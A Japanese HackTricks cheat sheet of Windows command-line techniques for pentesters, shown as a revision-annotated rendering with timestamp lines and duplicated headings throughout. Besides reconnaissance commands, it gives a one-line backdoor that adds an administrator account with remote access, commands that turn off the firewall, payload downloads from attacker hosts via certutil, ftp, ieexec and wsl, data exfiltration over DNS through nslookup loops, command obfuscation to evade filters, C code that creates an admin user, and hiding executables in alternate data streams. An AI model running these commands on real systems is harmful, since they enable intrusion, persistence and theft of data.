2023-07-07 23:42:27 +00:00
# ペンテスターのための基本的なWin CMD
2022-04-28 16:01:33 +00:00
< details >
2023-04-25 18:35:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-05 03:25:08 +00:00
* **サイバーセキュリティ企業**で働いていますか?**HackTricksで会社を宣伝**してみたいですか?または、**PEASSの最新バージョンにアクセス**したいですか、または**HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つけてください
* [**公式PEASS& HackTricksのスウォッグ** ](https://peass.creator-spring.com )を手に入れましょう
* **[💬](https://emojipedia.org/speech-balloon/) [Discordグループ ](https://discord.gg/hRep4RUj7f )**に参加するか、[Telegramグループ](https://t.me/peass)に参加するか、**Twitter**で私をフォローする[🐦](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **ハッキングトリックを共有するために、**[**hacktricksリポジトリ**](https://github.com/carlospolop/hacktricks) **と** [**hacktricks-cloudリポジトリ** ](https://github.com/carlospolop/hacktricks-cloud ) **にPRを提出してください。**
2022-04-28 16:01:33 +00:00
< / details >
2023-07-07 23:42:27 +00:00
## システム情報
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### バージョンとパッチ情報
2020-07-15 15:43:14 +00:00
```bash
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
2022-10-05 00:11:28 +00:00
wmic computersystem LIST full #Get PC info
2020-07-15 15:43:14 +00:00
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
2022-10-05 00:11:28 +00:00
wmic qfe list brief #Updates
2020-07-15 15:43:14 +00:00
hostname
2022-10-05 00:11:28 +00:00
2020-07-15 15:43:14 +00:00
DRIVERQUERY #3rd party driver vulnerable?
```
2023-07-07 23:42:27 +00:00
### 環境
2020-07-15 15:43:14 +00:00
```bash
set #List all environment variables
```
2024-02-05 03:25:08 +00:00
以下はハイライトすべき環境変数です:
2020-07-15 15:43:14 +00:00
2024-02-05 03:25:08 +00:00
* **COMPUTERNAME**: コンピューターの名前
2023-07-07 23:42:27 +00:00
* **TEMP/TMP:** 一時フォルダ
* **USERNAME:** ユーザー名
* **HOMEPATH/USERPROFILE:** ホームディレクトリ
2020-07-15 15:43:14 +00:00
* **windir:** C:\Windows
2023-07-07 23:42:27 +00:00
* **OS**: Windows OS
2024-02-05 03:25:08 +00:00
* **LOGONSERVER**: ドメインコントローラーの名前
2023-07-07 23:42:27 +00:00
* **USERDNSDOMAIN**: DNSで使用するドメイン名
* **USERDOMAIN**: ドメインの名前
2020-07-15 15:43:14 +00:00
```bash
nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
```
2023-07-07 23:42:27 +00:00
### マウントされたディスク
2020-07-15 15:43:14 +00:00
```bash
(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
2020-08-17 14:38:36 +00:00
wmic logicaldisk get caption,description,providername
2020-07-15 15:43:14 +00:00
```
2022-10-05 00:11:28 +00:00
### [Defender](authentication-credentials-uac-and-efs.md#defender)
2020-07-15 15:43:14 +00:00
2024-02-05 03:25:08 +00:00
### リサイクル ビン
2020-07-15 15:43:14 +00:00
```bash
dir C:\$Recycle.Bin /s /b
```
2024-02-05 03:25:08 +00:00
### プロセス、サービス&ソフトウェア
2020-07-15 15:43:14 +00:00
```bash
schtasks /query /fo LIST /v #Verbose out of scheduled tasks
2020-08-17 14:38:36 +00:00
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
2020-07-15 15:43:14 +00:00
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
```
2023-07-07 23:42:27 +00:00
## ドメイン情報
2020-07-15 15:43:14 +00:00
```bash
2022-10-05 00:11:28 +00:00
# Generic AD info
2020-07-15 15:43:14 +00:00
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
2022-10-05 00:11:28 +00:00
gpresult /V # Get current policy applied
wmic ntdomain list /format:list #Displays information about the Domain and Domain Controllers
# Users
dsquery user #Get all users
2020-07-15 15:43:14 +00:00
net user /domain #List all users of the domain
net user < ACCOUNT_NAME > /domain #Get information about that user
net accounts /domain #Password and lockout policy
2022-10-05 00:11:28 +00:00
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.
# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group
# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:< DOMAIN > #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers
# Trust relations
2023-03-06 18:20:33 +00:00
nltest /domain_trusts #Mapping of the trust relationships
2022-10-05 00:11:28 +00:00
# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
2020-07-15 15:43:14 +00:00
```
2023-07-07 23:42:27 +00:00
### ログとイベント
2020-07-15 15:43:14 +00:00
```bash
#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
```
2024-02-05 03:25:08 +00:00
## ユーザー&グループ
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
### ユーザー
2020-07-15 15:43:14 +00:00
```bash
2022-10-05 00:11:28 +00:00
#Me
2020-07-15 15:43:14 +00:00
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
2022-10-05 00:11:28 +00:00
# Local users
2020-07-15 15:43:14 +00:00
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
2022-10-05 00:11:28 +00:00
wmic USERACCOUNT Get Domain,Name,Sid
2020-07-15 15:43:14 +00:00
net user /add [username] [password] #Create user
2022-10-05 00:11:28 +00:00
# Other users looged
qwinsta #Anyone else logged in?
2020-07-15 15:43:14 +00:00
#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user< DOMAIN > \<NAME> "cmd.exe" ::The password will be prompted
2020-08-30 21:17:43 +00:00
#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe
2020-07-15 15:43:14 +00:00
```
2023-07-07 23:42:27 +00:00
### グループ
2020-07-15 15:43:14 +00:00
```bash
#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
2020-11-19 03:16:51 +00:00
net localgroup administrators [username] /add #Add user to administrators
2020-07-15 15:43:14 +00:00
#Domain
net group /domain #Info about domain groups
net group /domain < domain_group_name > #Users that belongs to the group
```
2024-02-05 03:25:08 +00:00
### セッションのリスト
2022-05-17 09:34:10 +00:00
```
2020-07-15 15:43:14 +00:00
qwinsta
klist sessions
```
2023-07-07 23:42:27 +00:00
### パスワードポリシー
2022-05-17 09:34:10 +00:00
```
2020-08-17 14:38:36 +00:00
net accounts
```
2023-07-07 23:42:27 +00:00
### 資格情報
2022-05-17 09:34:10 +00:00
```bash
cmdkey /list #List credential
2022-08-14 15:38:08 +00:00
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
2022-05-17 09:34:10 +00:00
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
```
2024-02-05 03:25:08 +00:00
### ユーザーに対する持続性
2020-07-15 15:43:14 +00:00
```bash
# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add
```
2023-07-07 23:42:27 +00:00
## ネットワーク
2020-07-15 15:43:14 +00:00
2024-02-05 03:25:08 +00:00
### インターフェース、ルート、ポート、ホスト、および DNS キャッシュ
2020-07-15 15:43:14 +00:00
```bash
ipconfig /all #Info about interfaces
route print #Print available routes
2020-08-11 10:48:41 +00:00
arp -a #Know hosts
2020-07-15 15:43:14 +00:00
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"
```
2023-07-07 23:42:27 +00:00
### ファイアウォール
2020-07-15 15:43:14 +00:00
```bash
netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles
NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Trun On
netsh firewall set opmode disable #Turn Off
2022-10-05 00:11:28 +00:00
#How to open ports
2020-07-15 15:43:14 +00:00
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
2023-07-07 23:42:27 +00:00
netsh firewall add portopening TCP 3389 "Remote Desktop"
2020-07-15 15:43:14 +00:00
2022-10-05 00:11:28 +00:00
#Enable Remote Desktop
2020-07-15 15:43:14 +00:00
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed
2022-10-05 00:11:28 +00:00
#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
2023-07-07 23:42:27 +00:00
#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable
#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable
::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
```
### 共有
```bash
net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares
```
### Wifi
2024-02-05 03:25:08 +00:00
### Wifi
2023-07-07 23:42:27 +00:00
```bash
2024-02-05 03:25:08 +00:00
netsh wlan show profile #AP SSID
netsh wlan show profile < SSID > key=clear #Get Cleartext Pass
2023-07-07 23:42:27 +00:00
```
2024-02-05 03:25:08 +00:00
### SNMP
2023-07-07 23:42:27 +00:00
2024-02-05 03:25:08 +00:00
### SNMP
2023-07-07 23:42:27 +00:00
```
2024-02-05 03:25:08 +00:00
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
2023-07-07 23:42:27 +00:00
```
2024-02-05 03:25:08 +00:00
### ネットワークインターフェース
2023-07-07 23:42:27 +00:00
```bash
2024-02-05 03:25:08 +00:00
ipconfig /all
2023-07-07 23:42:27 +00:00
```
2024-02-05 03:25:08 +00:00
### ARP テーブル
2023-07-07 23:42:27 +00:00
```bash
2024-02-05 03:25:08 +00:00
arp -A
2023-07-07 23:42:27 +00:00
```
2024-02-05 03:25:08 +00:00
## ダウンロード
2023-07-07 23:42:27 +00:00
2024-02-05 03:25:08 +00:00
Bitsadmin.exe
```
bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
```
```plaintext
CertReq.exe
```
```
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```
Certutil.exe
2023-07-07 23:42:27 +00:00
2024-02-05 03:25:08 +00:00
---
2023-07-07 23:42:27 +00:00
2024-02-05 03:25:08 +00:00
Certutil.exe
2023-07-07 23:42:27 +00:00
```
2024-02-05 03:25:08 +00:00
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
2023-07-07 23:42:27 +00:00
```
```plaintext
2024-02-05 03:25:08 +00:00
Desktopimgdownldr.exe
2023-07-07 23:42:27 +00:00
```
```
2024-02-05 03:25:08 +00:00
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
2023-07-07 23:42:27 +00:00
```
```plaintext
2024-02-05 03:25:08 +00:00
Diantz.exe
2023-07-07 23:42:27 +00:00
```
2024-02-05 03:25:08 +00:00
---
2023-07-07 23:42:27 +00:00
```plaintext
2024-02-05 03:25:08 +00:00
Diantz.exe
2023-07-07 23:42:27 +00:00
```
```
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
```
```plaintext
2024-02-05 03:25:08 +00:00
Esentutl.exe
2023-07-07 23:42:27 +00:00
```
2024-02-05 03:25:08 +00:00
---
2023-07-07 23:42:27 +00:00
```plaintext
2024-02-05 03:25:08 +00:00
Esentutl.exe
2023-07-07 23:42:27 +00:00
```
```
esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
```
```plaintext
2024-02-05 03:25:08 +00:00
Expand.exe
2023-07-07 23:42:27 +00:00
```
```plaintext
2024-02-05 03:25:08 +00:00
Expand.exe
2023-07-07 23:42:27 +00:00
```
```
expand \\webdav\folder\file.bat c:\ADS\file.bat
```
```plaintext
2024-02-05 03:25:08 +00:00
Extrac32.exe
2023-07-07 23:42:27 +00:00
```
2024-02-05 03:25:08 +00:00
---
2023-07-07 23:42:27 +00:00
```plaintext
2024-02-05 03:25:08 +00:00
Extrac32.exe
2023-07-07 23:42:27 +00:00
```
```
2024-02-05 03:25:08 +00:00
extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
2022-05-17 09:34:10 +00:00
```
2024-02-05 03:25:08 +00:00
```plaintext
Findstr.exe
2020-09-05 18:55:40 +00:00
```
2024-02-05 03:25:08 +00:00
---
2020-09-07 11:12:11 +00:00
2024-02-05 03:25:08 +00:00
```plaintext
Findstr.exe
2022-05-17 09:34:10 +00:00
```
2020-09-05 18:55:40 +00:00
```
2024-02-05 03:25:08 +00:00
findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe
2022-05-17 09:34:10 +00:00
```
2024-02-05 03:25:08 +00:00
```plaintext
Ftp.exe
2020-09-05 18:55:40 +00:00
```
2024-02-05 03:25:08 +00:00
```plaintext
Ftp.exe
2022-05-17 09:34:10 +00:00
```
2020-09-05 18:55:40 +00:00
```
2024-02-05 03:25:08 +00:00
cmd.exe /c "@echo open attacker.com 21>ftp.txt& @echo USER attacker>>ftp.txt& @echo PASS PaSsWoRd>>ftp.txt& @echo binary>>ftp.txt& @echo GET /payload.exe>>ftp.txt& @echo quit>>ftp.txt& @ftp -s:ftp.txt -v"
2022-05-17 09:34:10 +00:00
```
2024-02-05 03:25:08 +00:00
`GfxDownloadWrapper.exe`
2020-09-05 18:55:40 +00:00
```
2024-02-05 03:25:08 +00:00
C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
2020-09-05 18:55:40 +00:00
```
2023-07-07 23:42:27 +00:00
```plaintext
2024-02-05 03:25:08 +00:00
Hh.exe
```
```
HH.exe http://some.url/script.ps1
2022-05-17 09:34:10 +00:00
```
2023-07-07 23:42:27 +00:00
```plaintext
2024-02-05 03:25:08 +00:00
Ieexec.exe
2020-09-05 18:55:40 +00:00
```
2023-07-07 23:42:27 +00:00
```plaintext
2024-02-05 03:25:08 +00:00
Ieexec.exe
```
```
ieexec.exe http://x.x.x.x:8080/bypass.exe
2022-05-17 09:34:10 +00:00
```
2023-07-07 23:42:27 +00:00
```plaintext
2024-02-05 03:25:08 +00:00
Makecab.exe
2020-09-05 18:55:40 +00:00
```
2023-07-07 23:42:27 +00:00
```plaintext
2024-02-05 03:25:08 +00:00
Makecab.exe
```
```
makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
2022-05-17 09:34:10 +00:00
```
2023-07-07 23:42:27 +00:00
```plaintext
2024-02-05 03:25:08 +00:00
MpCmdRun.exe
2020-09-05 18:55:40 +00:00
```
2024-02-05 03:25:08 +00:00
MpCmdRun.exe
2022-05-17 09:34:10 +00:00
```
2024-02-05 03:25:08 +00:00
MpCmdRun.exe -DownloadFile -url < URL > -path < path > //Windows Defender executable
2020-09-05 18:55:40 +00:00
```
2023-07-07 23:42:27 +00:00
```plaintext
2024-02-05 03:25:08 +00:00
Replace.exe is a command-line utility that allows you to replace files in a directory. It can be used by pentesters to quickly replace files with malicious payloads during a penetration test.
2022-05-17 09:34:10 +00:00
```
2023-07-07 23:42:27 +00:00
```plaintext
2024-02-05 03:25:08 +00:00
Replace.exeは、ディレクトリ内のファイルを置き換えるためのコマンドラインユーティリティです。ペンテスターは、ペネトレーションテスト中に素早く悪意のあるペイロードを持つファイルを置き換えるために使用することができます。
2020-09-05 18:55:40 +00:00
```
2022-05-17 09:34:10 +00:00
```
2024-02-05 03:25:08 +00:00
replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A
2020-09-05 18:55:40 +00:00
```
2024-02-05 03:25:08 +00:00
```plaintext
Excel.exe
2022-05-17 09:34:10 +00:00
```
2024-02-05 03:25:08 +00:00
Excel.exe
2020-09-05 18:55:40 +00:00
```
2024-02-05 03:25:08 +00:00
Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
2022-05-17 09:34:10 +00:00
```
2024-02-05 03:25:08 +00:00
```plaintext
Powerpnt.exe
2020-09-05 18:55:40 +00:00
```
2022-05-17 09:34:10 +00:00
```
2024-02-05 03:25:08 +00:00
Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"
2020-09-05 18:55:40 +00:00
```
2024-02-05 03:25:08 +00:00
Squirrel.exe
2022-05-17 09:34:10 +00:00
```
2020-09-05 18:55:40 +00:00
squirrel.exe --download [url to package]
```
2024-02-05 03:25:08 +00:00
```plaintext
Update.exe
```
2022-05-17 09:34:10 +00:00
```
2020-09-05 18:55:40 +00:00
Update.exe --download [url to package]
```
2024-02-05 03:25:08 +00:00
Winword.exe
2022-05-17 09:34:10 +00:00
```
2020-09-05 18:55:40 +00:00
winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
```
2024-02-05 03:25:08 +00:00
```plaintext
wsl.exe
```
---
```plaintext
wsl.exe
```
2022-05-17 09:34:10 +00:00
```
2020-09-05 18:55:40 +00:00
wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
```
2023-07-07 23:42:27 +00:00
## その他
2020-07-15 15:43:14 +00:00
```bash
cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive list without shit
time #Get current time
date #Get current date
shutdown /r /t 0 #Shutdown now
type < file > #Cat file
2020-09-07 11:12:11 +00:00
2020-07-15 15:43:14 +00:00
#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
2021-03-18 23:05:52 +00:00
runas /netonly /user:< DOMAIN > \<NAME> "cmd.exe" ::The password will be prompted
2020-07-15 15:43:14 +00:00
#Hide
attrib +h file #Set Hidden
attrib -h file #Quit Hidden
#Give full control over a file that you owns
icacls < FILE_PATH > /t /e /p < USERNAME > :F
icacls < FILE_PATH > /e /r < USERNAME > #Remove the permision
#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win
#exe2bat to transform exe file in bat file
#ADS
dir /r #Detect ADS
more file.txt:ads.txt #read ADS
powershell (Get-Content file.txt -Stream ads.txt)
2022-08-13 13:54:19 +00:00
# Get error messages from code
net helpmsg 32 #32 is the code in that case
2020-07-15 15:43:14 +00:00
```
2024-02-05 03:25:08 +00:00
### 文字列ブラックリスト回避
2022-10-02 21:44:11 +00:00
```bash
2022-10-02 22:00:14 +00:00
echo %HOMEPATH:~6,-11% #\
who^ami #whoami
```
### DOSfuscation
2024-02-05 03:25:08 +00:00
CMDラインを曖昧化します
2022-10-02 22:00:14 +00:00
```powershell
git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
cd Invoke-DOSfuscation
Import-Module .\Invoke-DOSfuscation.psd1
Invoke-DOSfuscation
help
SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
encoding
2022-10-02 21:44:11 +00:00
```
2023-07-07 23:42:27 +00:00
### リッスンアドレスACL
2022-10-02 21:44:11 +00:00
2024-02-05 03:25:08 +00:00
管理者権限なしで[http://+:80/Temporary\_Listen\_Addresses/](http://+/Temporary\_Listen\_Addresses/)でリッスンできます。
2020-07-15 15:43:14 +00:00
```bash
netsh http show urlacl
```
2023-07-07 23:42:27 +00:00
### マニュアルDNSシェル
2020-07-15 15:43:14 +00:00
2023-07-07 23:42:27 +00:00
**攻撃者**( Kali) は、次の2つのオプションのいずれかを使用する必要があります:
2020-07-15 15:43:14 +00:00
```bash
sudo responder -I < iface > #Active
2020-09-07 11:12:11 +00:00
sudo tcpdump -i < iface > -A proto udp and dst port 53 and dst ip < KALI_IP > #Passive
2020-07-15 15:43:14 +00:00
```
2024-02-05 03:25:08 +00:00
#### 被害者
2020-07-15 15:43:14 +00:00
2024-02-05 03:25:08 +00:00
_**for /f tokens**_ \_\*\*\_技術: これにより、コマンドを実行し、各行の最初のX単語を取得してDNSを介してサーバーに送信できます
2022-05-17 09:34:10 +00:00
```
2020-07-15 15:43:14 +00:00
for /f %a in ('whoami') do nslookup %a < IP_kali > #Get whoami
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a < IP_kali > #Get word2
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c < IP_kali > #List folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c < IP_kali > #List that folder
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c < IP_kali > #Same as last one
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i < IP_kali > #Same as last one
```
2024-02-05 03:25:08 +00:00
あなたは出力を**リダイレクト**し、それを**読み取る**こともできます。
2022-05-17 09:34:10 +00:00
```
2020-07-15 15:43:14 +00:00
whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i < IP_kali >
```
2023-07-07 23:42:27 +00:00
## CコードからCMDを呼び出す
2020-07-15 15:43:14 +00:00
```c
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
// When executed by Administrator this program will create a user and then add him to the administrators group
// i686-w64-mingw32-gcc addmin.c -o addmin.exe
// upx -9 addmin.exe
int main (){
2023-07-07 23:42:27 +00:00
int i;
i=system("net users otherAcc 0TherAcc! /add");
i=system("net localgroup administrators otherAcc /add");
return 0;
2020-07-15 15:43:14 +00:00
}
```
2024-02-05 03:25:08 +00:00
## 代替データストリームチートシート( ADS/Alternate Data Stream)
2020-07-15 15:43:14 +00:00
2024-02-05 03:25:08 +00:00
**[https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)**から取得した例。その中にはさらにたくさんのものがあります!
2020-07-15 15:43:14 +00:00
```bash
2024-02-05 03:25:08 +00:00
## Selected Examples of ADS Operations ##
### Adding Content to ADS ###
# Append executable to a log file as an ADS
2020-07-15 15:43:14 +00:00
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
2024-02-05 03:25:08 +00:00
# Download a script directly into an ADS
2020-07-15 15:43:14 +00:00
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
2024-02-05 03:25:08 +00:00
### Discovering ADS Content ###
# List files and their ADS
2023-07-07 23:42:27 +00:00
dir /R
2024-02-05 03:25:08 +00:00
# Use Sysinternals tool to list ADS of a file
streams.exe < c: \path \to \file >
2020-08-11 12:53:46 +00:00
2024-02-05 03:25:08 +00:00
### Extracting Content from ADS ###
# Extract an executable stored in an ADS
2020-07-15 15:43:14 +00:00
expand c:\ads\file.txt:test.exe c:\temp\evil.exe
2024-02-05 03:25:08 +00:00
### Executing ADS Content ###
# Execute an executable stored in an ADS using WMIC
2020-07-15 15:43:14 +00:00
wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
2024-02-05 03:25:08 +00:00
# Execute a script stored in an ADS using PowerShell
2020-07-15 15:43:14 +00:00
powershell -ep bypass - < c: \temp:ttt
```
2022-04-28 16:01:33 +00:00
< details >
2024-02-05 03:25:08 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > - < a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-05 03:25:08 +00:00
* **サイバーセキュリティ企業**で働いていますか?**HackTricksで会社を宣伝**したいですか?または**最新版のPEASSにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を発見しましょう。独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションです。
* [**公式PEASS& HackTricksスウェグ** ](https://peass.creator-spring.com )を手に入れましょう。
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で私をフォロー[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**してください。**
* **ハッキングトリックを共有するためにPRを** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **と** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **に提出してください。**
2022-04-28 16:01:33 +00:00
< / details >